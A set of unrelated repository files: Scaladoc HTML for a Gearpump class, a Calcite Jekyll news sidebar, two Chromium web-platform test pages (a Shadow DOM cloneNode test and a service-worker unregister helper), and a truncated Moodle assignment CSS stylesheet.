<a id="hashCode():Int"></a>
<h4 class="signature">
<span class="modifier_kind">
<span class="modifier"></span>
<span class="kind">def</span>
</span>
<span class="symbol">
<span class="name">hashCode</span><span class="params">()</span><span class="result">: <span class="extype" name="scala.Int">Int</span></span>
</span>
</h4><span class="permalink">
<a href="../../../index.html#io.gearpump.cluster.Application@hashCode():Int" title="Permalink" target="_top">
<img src="../../../lib/permalink.png" />
</a>
</span>
<div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>AnyRef → Any</dd></dl></div>
</li><li name="scala.Any#isInstanceOf" visbl="pub" data-isabs="false" fullComment="yes" group="Ungrouped">
<a id="isInstanceOf[T0]:Boolean"></a>
<a id="isInstanceOf[T0]:Boolean"></a>
<h4 class="signature">
<span class="modifier_kind">
<span class="modifier">final </span>
<span class="kind">def</span>
</span>
<span class="symbol">
<span class="name">isInstanceOf</span><span class="tparams">[<span name="T0">T0</span>]</span><span class="result">: <span class="extype" name="scala.Boolean">Boolean</span></span>
</span>
</h4><span class="permalink">
<a href="../../../index.html#io.gearpump.cluster.Application@isInstanceOf[T0]:Boolean" title="Permalink" target="_top">
<img src="../../../lib/permalink.png" />
</a>
</span>
<div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>Any</dd></dl></div>
</li><li name="scala.AnyRef#ne" visbl="pub" data-isabs="false" fullComment="yes" group="Ungrouped">
<a id="ne(x$1:AnyRef):Boolean"></a>
<a id="ne(AnyRef):Boolean"></a>
<h4 class="signature">
<span class="modifier_kind">
<span class="modifier">final </span>
<span class="kind">def</span>
</span>
<span class="symbol">
<span class="name">ne</span><span class="params">(<span name="arg0">arg0: <span class="extype" name="scala.AnyRef">AnyRef</span></span>)</span><span class="result">: <span class="extype" name="scala.Boolean">Boolean</span></span>
</span>
</h4><span class="permalink">
<a href="../../../index.html#io.gearpump.cluster.Application@ne(x$1:AnyRef):Boolean" title="Permalink" target="_top">
<img src="../../../lib/permalink.png" />
</a>
</span>
<div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>AnyRef</dd></dl></div>
</li><li name="scala.AnyRef#notify" visbl="pub" data-isabs="false" fullComment="yes" group="Ungrouped">
<a id="notify():Unit"></a>
<a id="notify():Unit"></a>
<h4 class="signature">
<span class="modifier_kind">
<span class="modifier">final </span>
<span class="kind">def</span>
</span>
<span class="symbol">
<span class="name">notify</span><span class="params">()</span><span class="result">: <span class="extype" name="scala.Unit">Unit</span></span>
</span>
</h4><span class="permalink">
<a href="../../../index.html#io.gearpump.cluster.Application@notify():Unit" title="Permalink" target="_top">
<img src="../../../lib/permalink.png" />
</a>
</span>
<div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>AnyRef</dd></dl></div>
</li><li name="scala.AnyRef#notifyAll" visbl="pub" data-isabs="false" fullComment="yes" group="Ungrouped">
<a id="notifyAll():Unit"></a>
<a id="notifyAll():Unit"></a>
<h4 class="signature">
<span class="modifier_kind">
<span class="modifier">final </span>
<span class="kind">def</span>
</span>
<span class="symbol">
<span class="name">notifyAll</span><span class="params">()</span><span class="result">: <span class="extype" name="scala.Unit">Unit</span></span>
</span>
</h4><span class="permalink">
<a href="../../../index.html#io.gearpump.cluster.Application@notifyAll():Unit" title="Permalink" target="_top">
<img src="../../../lib/permalink.png" />
</a>
</span>
<div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>AnyRef</dd></dl></div>
</li><li name="scala.AnyRef#synchronized" visbl="pub" data-isabs="false" fullComment="yes" group="Ungrouped">
<a id="synchronized[T0](x$1:=>T0):T0"></a>
<a id="synchronized[T0](⇒T0):T0"></a>
<h4 class="signature">
<span class="modifier_kind">
<span class="modifier">final </span>
<span class="kind">def</span>
</span>
<span class="symbol">
<span class="name">synchronized</span><span class="tparams">[<span name="T0">T0</span>]</span><span class="params">(<span name="arg0">arg0: ⇒ <span class="extype" name="java.lang.AnyRef.synchronized.T0">T0</span></span>)</span><span class="result">: <span class="extype" name="java.lang.AnyRef.synchronized.T0">T0</span></span>
</span>
</h4><span class="permalink">
<a href="../../../index.html#io.gearpump.cluster.Application@synchronized[T0](x$1:=>T0):T0" title="Permalink" target="_top">
<img src="../../../lib/permalink.png" />
</a>
</span>
<div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>AnyRef</dd></dl></div>
</li><li name="scala.AnyRef#toString" visbl="pub" data-isabs="false" fullComment="yes" group="Ungrouped">
<a id="toString():String"></a>
<a id="toString():String"></a>
<h4 class="signature">
<span class="modifier_kind">
<span class="modifier"></span>
<span class="kind">def</span>
</span>
<span class="symbol">
<span class="name">toString</span><span class="params">()</span><span class="result">: <span class="extype" name="java.lang.String">String</span></span>
</span>
</h4><span class="permalink">
<a href="../../../index.html#io.gearpump.cluster.Application@toString():String" title="Permalink" target="_top">
<img src="../../../lib/permalink.png" />
</a>
</span>
<div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>AnyRef → Any</dd></dl></div>
</li><li name="scala.AnyRef#wait" visbl="pub" data-isabs="false" fullComment="yes" group="Ungrouped">
<a id="wait():Unit"></a>
<a id="wait():Unit"></a>
<h4 class="signature">
<span class="modifier_kind">
<span class="modifier">final </span>
<span class="kind">def</span>
</span>
<span class="symbol">
<span class="name">wait</span><span class="params">()</span><span class="result">: <span class="extype" name="scala.Unit">Unit</span></span>
</span>
</h4><span class="permalink">
<a href="../../../index.html#io.gearpump.cluster.Application@wait():Unit" title="Permalink" target="_top">
<img src="../../../lib/permalink.png" />
</a>
</span>
<div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>AnyRef</dd><dt>Annotations</dt><dd>
<span class="name">@throws</span><span class="args">(<span>
<span class="defval" name="classOf[java.lang.InterruptedException]">...</span>
</span>)</span>
</dd></dl></div>
</li><li name="scala.AnyRef#wait" visbl="pub" data-isabs="false" fullComment="yes" group="Ungrouped">
<a id="wait(x$1:Long,x$2:Int):Unit"></a>
<a id="wait(Long,Int):Unit"></a>
<h4 class="signature">
<span class="modifier_kind">
<span class="modifier">final </span>
<span class="kind">def</span>
</span>
<span class="symbol">
<span class="name">wait</span><span class="params">(<span name="arg0">arg0: <span class="extype" name="scala.Long">Long</span></span>, <span name="arg1">arg1: <span class="extype" name="scala.Int">Int</span></span>)</span><span class="result">: <span class="extype" name="scala.Unit">Unit</span></span>
</span>
</h4><span class="permalink">
<a href="../../../index.html#io.gearpump.cluster.Application@wait(x$1:Long,x$2:Int):Unit" title="Permalink" target="_top">
<img src="../../../lib/permalink.png" />
</a>
</span>
<div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>AnyRef</dd><dt>Annotations</dt><dd>
<span class="name">@throws</span><span class="args">(<span>
<span class="defval" name="classOf[java.lang.InterruptedException]">...</span>
</span>)</span>
</dd></dl></div>
</li><li name="scala.AnyRef#wait" visbl="pub" data-isabs="false" fullComment="yes" group="Ungrouped">
<a id="wait(x$1:Long):Unit"></a>
<a id="wait(Long):Unit"></a>
<h4 class="signature">
<span class="modifier_kind">
<span class="modifier">final </span>
<span class="kind">def</span>
</span>
<span class="symbol">
<span class="name">wait</span><span class="params">(<span name="arg0">arg0: <span class="extype" name="scala.Long">Long</span></span>)</span><span class="result">: <span class="extype" name="scala.Unit">Unit</span></span>
</span>
</h4><span class="permalink">
<a href="../../../index.html#io.gearpump.cluster.Application@wait(x$1:Long):Unit" title="Permalink" target="_top">
<img src="../../../lib/permalink.png" />
</a>
</span>
<div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>AnyRef</dd><dt>Annotations</dt><dd>
<span class="name">@throws</span><span class="args">(<span>
<span class="defval" name="classOf[java.lang.InterruptedException]">...</span>
</span>)</span>
</dd></dl></div>
</li></ol>
</div>
</div>
<div id="inheritedMembers">
<div class="parent" name="scala.AnyRef">
<h3>Inherited from <span class="extype" name="scala.AnyRef">AnyRef</span></h3>
</div><div class="parent" name="scala.Any">
<h3>Inherited from <span class="extype" name="scala.Any">Any</span></h3>
</div>
</div>
<div id="groupedMembers">
<div class="group" name="Ungrouped">
<h3>Ungrouped</h3>
</div>
</div>
</div>
<div id="tooltip"></div>
<div id="footer"> </div>
</body>
</html>
|
site/_includes/news_contents.html
|
dindin5258/calcite
|
<div class="unit one-fifth hide-on-mobiles">
<aside>
<ul>
<li class="{% if page.title == 'News' %}current{% endif %}">
<a href="{{ site.baseurl }}/news/">All News</a>
</li>
<li class="{% if page.title == 'Releases' %}current{% endif %}">
<a href="{{ site.baseurl }}/news/releases/">Calcite Releases</a>
</li>
</ul>
<h4>Recent Releases</h4>
<ul>
{% for post in site.categories.release limit:5 %}
<li class="{% if page.title == post.title %}current{% endif %}">
<a href="{{ site.baseurl }}{{ post.url }}">{{ post.version }}</a>
</li>
{% endfor %}
</ul>
<h4>Other News</h4>
<ul>
{% for post in site.posts %}{% comment %}
{% endcomment %}{% unless post.categories contains 'release' %}
<li class="{% if page.title == post.title %}current{% endif %}">
<a href="{{ site.baseurl }}{{ post.url }}">{{ post.title }}</a>
</li>
{% endunless %}{% comment %}
{% endcomment %}{% endfor %}
</ul>
</aside>
</div>
|
third_party/WebKit/LayoutTests/imported/web-platform-tests/shadow-dom/untriaged/elements-and-dom-objects/shadowroot-object/shadowroot-methods/test-010.html
|
js0701/chromium-crosswalk
|
<!DOCTYPE html>
<!--
Distributed under both the W3C Test Suite License [1] and the W3C
3-clause BSD License [2]. To contribute to a W3C Test Suite, see the
policies and contribution forms [3].
[1] http://www.w3.org/Consortium/Legal/2008/04-testsuite-license
[2] http://www.w3.org/Consortium/Legal/2008/03-bsd-license
[3] http://www.w3.org/2004/10/27-testcases
-->
<html>
<head>
<title>Shadow DOM Test: A_10_01_02_09</title>
<link rel="author" title="Sergey G. Grekhov" href="mailto:sgrekhov@unipro.ru">
<link rel="help" href="http://www.w3.org/TR/2013/WD-shadow-dom-20130514/#shadow-root-methods">
<meta name="assert" content="ShadowRoot Object: Invoking the cloneNode() method on a ShadowRoot instance must always throw a DATA_CLONE_ERR exception.">
<script src="../../../../../../../resources/testharness.js"></script>
<script src="../../../../../../../resources/testharnessreport.js"></script>
<script src="../../../testcommon.js"></script>
<link rel="stylesheet" href="../../../../../../../resources/testharness.css">
</head>
<body>
<div id="log"></div>
<script>
test(unit(function (ctx) {
var d = newRenderedHTMLDocument(ctx);
var host = d.createElement('div');
d.body.appendChild(host);
var s = host.createShadowRoot();
try {
s.cloneNode();
assert_true(false, 'Invoking the cloneNode() method on a ShadowRoot instance must always ' +
'throw a DATA_CLONE_ERR exception.');
} catch (e) {
assert_equals(e.code, 25, 'Wrong exceprion type');
}
}), 'A_10_01_02_09_T01');
</script>
</body>
</html>
|
third_party/blink/web_tests/external/wpt/service-workers/service-worker/resources/unregister-rewrite-worker.html
|
chromium/chromium
|
<!DOCTYPE html>
<meta charset="utf-8"/>
<script>
async function onLoad() {
const params = new URLSearchParams(self.location.search);
const scope = self.origin + params.get('scopepath');
const reg = await navigator.serviceWorker.getRegistration(scope);
if (reg) {
await reg.unregister();
}
if (window.opener) {
window.opener.postMessage({ type: 'SW-UNREGISTERED' }, '*');
} else {
window.top.postMessage({ type: 'SW-UNREGISTERED' }, '*');
}
}
self.addEventListener('load', onLoad);
</script>
|
moodle/mod/assign/styles.css
|
rafaelperazzo/ufca-web
|
.path-mod-assign div.gradingnavigation div {
float: left;
margin-left: 2em;
}
.path-mod-assign div.submissionstatustable,
.path-mod-assign div.submissionfull,
.path-mod-assign div.submissionlinks,
.path-mod-assign div.usersummary,
.path-mod-assign div.feedback,
.path-mod-assign div.gradingsummary {
margin-bottom: 5em;
}
.path-mod-assign div.submissionstatus .generaltable,
.path-mod-assign div.submissionlinks .generaltable,
.path-mod-assign div.feedback .generaltable,
.path-mod-assign div.submissionsummarytable .generaltable,
.path-mod-assign div.attempthistory table,
.path-mod-assign div.gradingsummary .generaltable {
width: 100%;
}
.path-mod-assign table.generaltable table td {
border: 0px none;
}
.path-mod-assign .gradingsummarytable,
.path-mod-assign .feedbacktable,
.path-mod-assign .lockedsubmission,
.path-mod-assign .submissionsummarytable {
margin-top: 1em;
}
.path-mod-assign div.submissionsummarytable table tbody tr td.c0 {
width: 30%;
}
.path-mod-assign .submittedlate {
color: red;
font-weight: 900;
}
.path-mod-assign.jsenabled .gradingoptionsform .fsubmit {
display: none;
}
.path-mod-assign.jsenabled .gradingtable .c1 select {
display: none;
}
.path-mod-assign .quickgradingform .mform fieldset {
margin: 0px;
padding: 0px;
}
.path-mod-assign .gradingbatchoperationsform .mform fieldset {
margin: 0px;
padding: 0px;
}
.path-mod-assign td.submissionstatus,
.path-mod-assign div.submissionstatus,
.path-mod-assign a:link.submissionstatus {
color: black;
background-color: #efefef;
}
.path-mod-assign td.submissionstatusdraft,
.path-mod-assign div.submissionstatusdraft,
.path-mod-assign a:link.submissionstatusdraft {
color: black;
background-color: #efefcf;
}
.path-mod-assign td.submissionstatussubmitted,
.path-mod-assign div.submissionstatussubmitted,
.path-mod-assign a:link.submissionstatussubmitted {
color: black;
background-color: #cfefcf;
}
.path-mod-assign td.submissionlocked,
.path-mod-assign div.submissionlocked {
color: black;
background-color: #efefcf;
}
.path-mod-assign td.submissionreopened,
.path-mod-assign div.submissionreopened {
color: black;
background-color: #efefef;
}
.path-mod-assign td.submissiongraded,
.path-mod-assign div.submissiongraded {
color: black;
background-color: #cfefcf;
}
.path-mod-assign td.submissionnotgraded,
.path-mod-assign div.submissionnotgraded {
color: black;
background-color: #efefef;
}
.path-mod-assign td.latesubmission,
.path-mod-assign a:link.latesubmission,
.path-mod-assign div.latesubmission {
color: black;
background-color: #efcfcf;
}
.path-mod-assign td.earlysubmission,
.path-mod-assign div.earlysubmission {
color: black;
background-color: #cfefcf;
}
.path-mod-assign .gradingtable .c0 {
display: none;
}
.path-mod-assign.jsenabled .gradingtable .c0 {
display: table-cell;
}
.path-mod-assign .gradingbatchoperationsform {
display: none;
}
.path-mod-assign.jsenabled .gradingbatchoperationsform {
display: block;
}
.path-mod-assign .gradingtable tr.selectedrow td {
background-color: #ffeecc;
}
.path-mod-assign .gradingtable tr.unselectedrow td {
background-color: white;
}
.path-mod-assign .gradingtable .c0 div.selectall {
margin-left: 7px;
}
.path-mod-assign .gradingtable .yui3-menu ul {
margin: 0px;
}
.path-mod-assign .gradingtable .yui3-menu-label {
padding-left: 0px;
line-height: 12px;
}
.path-mod-assign .gradingtable .yui3-menu-label img {
padding: 0 3px;
}
.path-mod-assign .gradingtable .yui3-menu li {
list-style-type: none;
}
.path-mod-assign.jsenabled .gradingtable .yui3-loading {
display: none;
}
.path-mod-assign .gradingtable .yui3-menu .yui3-menu-content {
border: 0px;
padding-top: 0;
}
.path-mod-assign div.gradingtable tr .quickgrademodified {
background-color: #FFCC99;
}
.path-mod-assign td.submissioneditable {
color: red;
}
.path-mod-assign .expandsummaryicon {
cursor: pointer;
display: none;
}
.path-mod-assign.jsenabled .expandsummaryicon {
display: inline;
}
.path-mod-assign .hidefull {
display: none;
}
.path-mod-assign .quickgradingform form .commentscontainer input,
.path-mod-assign .quickgradingform form .commentscontainer textarea {
display: none;
}
.path-mod-assign.jsenabled .quickgradingform form .commentscontainer input,
.path-mod-assign.jsenabled .quickgradingform form .commentscontainer textarea {
display: inline;
}
.path-mod-assign .previousfeedbackwarning {
font-size: 140%;
font-weight: bold;
text-align: center;
color: #500;
}
.path-mod-assign .submissionhistory {
background-color: #b0b0b0;
}
.path-mod-assign .submissionhistory .cell.historytitle {
background-color: #808080;
}
.path-mod-assign .submissionhistory .cell {
background-color: #d0d0d0;
}
.path-mod-assign.jsenabled .mod-assign-history-link {
display: block;
cursor: pointer;
margin-bottom: 7px;
}
.path-mod-assign.jsenabled .mod-assign-history-link h4 {
display: inline;
}
.path-mod-assign.jsenabled .attempthistory h4 {
margin-bottom: 7px;
text-align: left;
}
.path-mod-assign.jsenabled.dir_rtl .attempthistory h4 {
text-align: right;
}
.path-mod-assign.dir-rtl.jsenabled .mod-assign-history-link h4 {
text-align: right;
}
.path-mod-assign.jsenabled .mod-assign-history-link-open {
padding: 0 5px 0 20px; background: url([[pix:t/expanded]]) 2px center no-repeat;
}
.path-mod-assign.jsenabled .mod-assign-history-link-closed {
padding: 0 5px 0 20px; background: url([[pix:t/collapsed]]) 2px center no-repeat;
}
.path-mod-assign.dir-rtl.jsenabled .mod-assign-history-link-closed {
padding: 0 20px 0 5px; background: url([[pix:t/collapsed_rtl]]) 2px center no-repeat;
}
.path-mod-assign .submithelp {
padding: 1em;
}
.path-mod-assign .feedbacktitle {
font-weight: bold;
}
.path-mod-assign .submitconfirm,
.path-mod-assign .submissionlinks,
.path-mod-assign .submissionaction {
text-align: center;
}
.path-mod-assign .submissionsummarytable .c0,
.path-mod-assign .mod-assign-history-panel .c0 {
width: 150px;
}
.path-mod-assign .gradingtable .moodle-actionmenu {
white-space: nowrap;
}
.path-mod-assign .gradingtable .moodle-actionmenu[data-enhanced].show .menu a {
padding-left: 12px;
padding-right: 12px;
}
.path-mod-assign .gradingtable .menu-action img {
display: none;
}
.path-mod-assign .editsubmissionform input[name="submissionstatement"] {
vertical-align: top;
}
.path-mod-assign .editsubmissionform label[for="id_submissionstatement"] {
display: inline-block;
}
.path-mod-assign.layout-option-nonavbar {
padding-top: 0px;
}
.path-mod-assign [data-region="user-selector"] select {
margin-bottom: 0px;
}
.path-mod-assign [data-region="user-selector"] .alignment {
float: right;
width: 320px;
text-align: center;
margin-top: 7px;
}
.path-mod-assign [data-region="user-selector"] [data-action="previous-user"],
.path-mod-assign [data-region="user-selector"] [data-action="next-user"] {
font-size: 26px;
}
.path-mod-assign [data-region="user-selector"] [data-action="next-user"] {
margin-left: -10px;
}
.dir-rtl.path-mod-assign [data-region="user-selector"] [data-action="next-user"] {
margin-right: -10px;
}
.dir-rtl.path-mod-assign [data-region="user-selector"] .alignment {
float: left;
}
.path-mod-assign [data-region="user-selector"] .alignment input {
margin-bottom: 5px;
}
.path-mod-assign [data-region="user-selector"] .alignment .form-autocomplete-downarrow {
top: 0;
}
.path-mod-assign [data-region="user-selector"] .form-autocomplete-selection {
display: none;
}
.path-mod-assign [data-region="user-selector"] .form-autocomplete-suggestions {
text-align: left;
}
.path-mod-assign [data-region="user-selector"] .form-autocomplete-suggestions {
margin-left: 48px;
}
.dir-rtl.path-mod-assign [data-region="user-selector"] .form-autocomplete-suggestions {
margin-right: 64px;
}
.path-mod-assign [data-region="user-filters"] {
font-size: small;
}
.path-mod-assign [data-region="configure-filters"] {
display: none;
text-align: left;
width: auto;
background-color: #fff;
background-clip: padding-box;
box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
border-radius: 6px;
position: absolute;
margin-top: 28px;
margin-left: -140px;
padding: 10px 0;
z-index: 1;
}
.path-mod-assign [data-region="configure-filters"]::before,
.path-mod-assign [data-region="configure-filters"]::after {
position: absolute;
left: auto;
display: inline-block;
content: '';
border-style: solid;
border-color: transparent;
border-top: none;
}
.path-mod-assign [data-region="configure-filters"]::before {
top: -7px;
right: 12px;
border-width: 7px;
border-bottom-color: rgba(0, 0, 0, 0.2);
}
.path-mod-assign [data-region="configure-filters"]::after {
top: -6px;
right: 13px;
border-width: 6px;
border-bottom-color: #fff;
}
.path-mod-assign.dir-rtl [data-region="configure-filters"] {
text-align: right;
margin-left: 0;
margin-right: -140px;
}
.path-mod-assign [data-region="configure-filters"] label {
padding: 3px 20px;
}
.path-mod-assign .alignment [data-region="configure-filters"] input {
margin-bottom: 0;
}
.path-mod-assign [data-region="grading-navigation-panel"] {
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 6em;
margin: 0;
border-bottom: 1px solid #ddd;
}
.path-mod-assign [data-region="grading-navigation"] {
padding: 1em;
}
.path-mod-assign [data-region="user-info"] {
height: 60px;
}
.path-mod-assign [data-region="user-info"] a {
text-decoration: none;
}
.path-mod-assign [data-region="user-info"] .img-rounded {
display: block;
float: left;
margin-top: -3px;
margin-right: 10px;
}
.dir-rtl.path-mod-assign [data-region="user-info"] .img-rounded {
float: right;
margin-left: 10px;
}
.path-mod-assign [data-region="user-info"] em {
display: block;
font-style: normal;
}
.path-mod-assign [data-region="grading-actions-form"] label {
display: inline-block;
}
.path-mod-assign.pagelayout-embedded {
overflow: hidden;
}
.path-mod-assign [data-region="review-panel"] {
position: absolute;
top: 85px;
bottom: 60px;
left: 0;
width: 70%;
box-sizing: border-box;
}
.path-mod-assign [data-region="review-panel"] .pageheader {
border-right: 1px solid #ddd;
}
.path-mod-assign [data-region="review-panel"] .drawingregion {
left: 0;
right: 0;
border-color: #ddd;
}
.path-mod-assign [data-region="grade-panel"].fullwidth {
position: absolute;
top: 7em;
left: 0;
right: 0;
width: 99%;
overflow: auto;
bottom: 7em;
}
.path-mod-assign [data-region="grade-panel"].fullwidth [data-region="grade"] {
max-width: 800px;
margin-left: auto;
margin-right: auto;
}
.path-mod-assign [data-region="grade-panel"] {
position: absolute;
top: 85px;
bottom: 60px;
right: 0;
width: 30%;
overflow: auto;
box-sizing: border-box;
background-color: #f5f5f5;
padding: 15px;
padding-top: 0px;
}
.path-mod-assign [data-region="grade-panel"] h3 {
font-size: 18px;
font-weight: 500;
}
/***** Start submission status *****/
.path-mod-assign [data-region="grade-panel"] div.submissionstatustable {
margin-bottom: 2em;
}
.path-mod-assign [data-region="grade-panel"] .submissionsummarytable {
margin-left: 5px;
margin-right: 5px;
}
.path-mod-assign [data-region="grade-panel"] .submissionsummarytable table.generaltable td {
padding: 8px 0;
background-color: transparent;
}
.path-mod-assign [data-region="grade-panel"] .submissionsummarytable .generaltable tbody > tr:nth-child(2n+1) > td,
.path-mod-assign [data-region="grade-panel"] .submissionsummarytable .generaltable tbody tr:hover > td {
background-color: transparent;
}
.path-mod-assign [data-region="grade-panel"] div.submissionsummarytable table tbody tr td.c0 {
width: auto;
}
.path-mod-assign [data-region="grade-panel"] div.submissionsummarytable table tbody tr.lastrow td.c0,
.path-mod-assign [data-region="grade-panel"] div.submissionsummarytable table tbody tr.lastrow td.c1 {
border-bottom: 1px solid #ddd;
}
.path-mod-assign [data-region="grade-panel"] td.submissionnotgraded,
.path-mod-assign [data-region="grade-panel"] div.submissionnotgraded {
color: red;
background-color: transparent;
}
/***** End submission status *****/
.path-mod-assign [data-region="grade-panel"] #id_gradeheader {
display: table-cell;
min-width: 0;
}
.path-mod-assign [data-region="grade-panel"] #id_gradeheader > legend {
visibility: hidden;
height: 0;
margin-bottom: 0;
}
.path-mod-assign [data-region="grade-panel"] .comment-area textarea[cols] {
width: 100%;
box-sizing: border-box;
}
.path-mod-assign [data-region="grade-panel"] .mform .fitem.fitem_ftext,
.path-mod-assign [data-region="grade-panel"] .mform .fitem.fitem_f,
.path-mod-assign [data-region="grade-panel"] .mform .fitem.fitem_feditor,
.path-mod-assign [data-region="grade-panel"] .mform .fitem.fitem_ffilemanager {
background-color: #fff;
border: 1px solid #ddd;
margin-bottom: 20px;
}
.path-mod-assign [data-region="grade-panel"] .mform .fitem.fitem_ftext .fitemtitle,
.path-mod-assign [data-region="grade-panel"] .mform .fitem.fitem_f .fitemtitle,
.path-mod-assign [data-region="grade-panel"] .mform .fitem.fitem_feditor .fitemtitle,
.path-mod-assign [data-region="grade-panel"] .mform .fitem.fitem_ffilemanager .fitemtitle {
padding-left: 5px;
padding-right: 5px;
}
.path-mod-assign #page-content [data-region="grade-panel"] .mform:not(.unresponsive) .fcontainer .fitem.fitem_ftext .felement,
.path-mod-assign #page-content [data-region="grade-panel"] .mform:not(.unresponsive) .fcontainer .fitem.fitem_f .felement,
.path-mod-assign #page-content [data-region="grade-panel"] .mform:not(.unresponsive) .fcontainer .fitem.fitem_feditor .felement,
.path-mod-assign #page-content [data-region="grade-panel"] .mform:not(.unresponsive) .fcontainer .fitem.fitem_ffilemanager .felement {
padding: 6px 10px 10px;
box-sizing: border-box;
}
.path-mod-assign #page-content [data-region="grade-panel"] .mform:not(.unresponsive) .fitem.fitem_ftext .fitemtitle,
.path-mod-assign #page-content [data-region="grade-panel"] .mform:not(.unresponsive) .fitem.fitem_f .fitemtitle,
.path-mod-assign #page-content [data-region="grade-panel"] .mform:not(.unresponsive) .fitem.fitem_feditor .fitemtitle,
.path-mod-assign #page-content [data-region="grade-panel"] .mform:not(.unresponsive) .fitem.fitem_ffilemanager .fitemtitle {
border-bottom: 1px solid #ddd;
box-shadow: 0 1px 1px rgba(0,0,0,0.05);
padding: 6px 10px 3px;
box-sizing: border-box;
}
.path-mod-assign #page-content [data-region="grade-panel"] [data-region="popout-button"] img {
margin-left: 2px;
margin-right: 2px;
margin-top: -2px;
}
.path-mod-assign #page-content [data-region="grade-panel"] .popout [data-region="popout-button"] img {
margin-left: -6px;
margin-right: -6px;
margin-top: 4px;
}
.path-mod-assign [data-region="grade-panel"] .fitem .fstaticlabel,
.path-mod-assign #page-content [data-region="grade-panel"] .mform:not(.unresponsive) .fitem .fitemtitle label {
font-weight: 500;
}
/***** Start grade *****/
.path-mod-assign [data-region="grade-panel"] .mform #fitem_id_grade.fitem {
padding-top: 5px;
}
.path-mod-assign #page-content [data-region="grade-panel"] .mform:not(.unresponsive) #fitem_id_grade.fitem .fitemtitle {
display: inline-block;
width: auto;
border-bottom: none;
box-shadow: none;
}
.path-mod-assign #page-content [data-region="grade-panel"] .mform:not(.unresponsive) #fitem_id_grade.fitem .felement {
width: auto;
float: right;
}
.path-mod-assign #page-content .mform:not(.unresponsive) #fitem_id_grade.fitem .felement input {
width: 80px;
margin-bottom: 0;
}
/***** End grade *****/
/***** Start rubric *****/
.path-mod-assign [data-region="grade-panel"] .gradingform_rubric {
padding-bottom: 0;
max-width: none;
}
.path-mod-assign [data-region="grade-panel"] .gradingform_rubric .criterion .description {
font-weight: 500;
min-width: 150px;
}
.path-mod-assign [data-region="grade-panel"] .gradingform_rubric .criterion .levels {
background-color: #fff;
}
.path-mod-assign [data-region="grade-panel"] .gradingform_rubric .criterion,
.path-mod-assign [data-region="grade-panel"] .gradingform_rubric .criterion.even {
background-color: transparent;
}
.path-mod-assign [data-region="grade-panel"] .gradingform_rubric.evaluate .criterion .levels .level:hover {
background-color: #dff0d8;
}
.path-mod-assign [data-region="grade-panel"] .gradingform_rubric .criterion .levels .level.checked {
background-color: #dff0d8;
border: none;
border-left: 1px solid #ddd;
}
.path-mod-assign [data-region="grade-panel"] .gradingform_rubric .criterion .levels .level .score {
color: #468847;
font-weight: 500;
font-style: normal;
margin-top: 20px;
}
.path-mod-assign [data-region="grade-panel"] .gradingform_rubric .criterion .remark textarea {
margin-bottom: 0;
}
/***** End rubric *****/
/***** Start marking guide *****/
.path-mod-assign [data-region="grade-panel"] .gradingform_guide {
margin-bottom: 10px;
}
.path-mod-assign [data-region="grade-panel"] .gradingform_guide .descriptionreadonly,
.path-mod-assign [data-region="grade-panel"] .gradingform_guide .remark,
.path-mod-assign [data-region="grade-panel"] .gradingform_guide .score {
display: block;
}
.path-mod-assign [data-region="grade-panel"] .gradingform_guide .descriptionreadonly {
padding-top: 10px;
}
.path-mod-assign [data-region="grade-panel"] .gradingform_guide .criteriondescription {
margin-top: 5px;
}
.path-mod-assign [data-region="grade-panel"] .gradingform_guide .criteriondescriptionmarkers {
width: auto;
margin-top: 5px;
}
.path-mod-assign [data-region="grade-panel"] .gradingform_guide .markingguideremark {
margin-bottom: 10px;
}
.path-mod-assign [data-region="grade-panel"] .gradingform_guide .remark .commentchooser {
float: right;
margin-top: 2px;
margin-left: 0;
}
.path-mod-assign [data-region="grade-panel"] .gradingform_guide .score {
float: left;
padding-bottom: 8px;
}
.path-mod-assign [data-region="grade-panel"] .gradingform_guide .score input,
.path-mod-assign [data-region="grade-panel"] .gradingform_guide .score div {
display: inline-block;
}
.path-mod-assign [data-region="grade-panel"] .gradingform_guide .criterion,
.path-mod-assign [data-region="grade-panel"] .gradingform_guide .criterion.even {
background-color: transparent;
border-width: 0 0 1px 0;
padding: 8px 0;
}
.path-mod-assign [data-region="grade-panel"] .showmarkerdesc,
.path-mod-assign [data-region="grade-panel"] .showstudentdesc {
background-color: #f5f5f5;
padding: 10px;
}
/***** End marking guide *****/
.path-mod-assign [data-region="grade-panel"] .fitem.fitem_ffilemanager {
margin-bottom: 0;
}
/***** Start popout dialogue *****/
.path-mod-assign [data-region="grade-panel"] .fitem.popout {
position: fixed;
left: 20%;
right: 20%;
top: 20%;
bottom: 20%;
z-index: 1000;
border: 1px solid rgba(0, 0, 0, 0.3);
border-radius: 6px;
box-shadow: 0 3px 7px rgba(0, 0, 0, 0.3);
}
.path-mod-assign #page-content [data-region="grade-panel"] .mform:not(.unresponsive) .fcontainer .fitem.popout .fitemtitle {
text-align: center;
padding-left: 15px;
padding-right: 15px;
height: 45px;
}
.path-mod-assign #page-content [data-region="grade-panel"] .mform:not(.unresponsive) .fcontainer .fitem.popout .fitemtitle label {
font-size: 16px;
line-height: 30px;
}
.path-mod-assign #page-content [data-region="grade-panel"] [data-region="popout-button"] {
float: right;
}
.dir-rtl.path-mod-assign #page-content [data-region="grade-panel"] [data-region="popout-button"] {
float: left;
}
.path-mod-assign #page-content [data-region="grade-panel"] .mform:not(.unresponsive) .fitem.popout .fitemtitle [data-region="popout-button"] img {
margin-top: -10px;
margin-right: -7px;
}
.path-mod-assign #page-content [data-region="grade-panel"] .mform:not(.unresponsive) .fcontainer .fitem.popout .felement {
padding: 10px 15px 15px;
height: calc(100% - 54px);
overflow: auto;
}
.path-mod-assign #page-content [data-region="grade-panel"] .mform:not(.unresponsive) .fcontainer .fitem.popout .felement .gradingform_rubric {
overflow: visible;
}
/***** End popout dialogue *****/
/***** Start attempt settings *****/
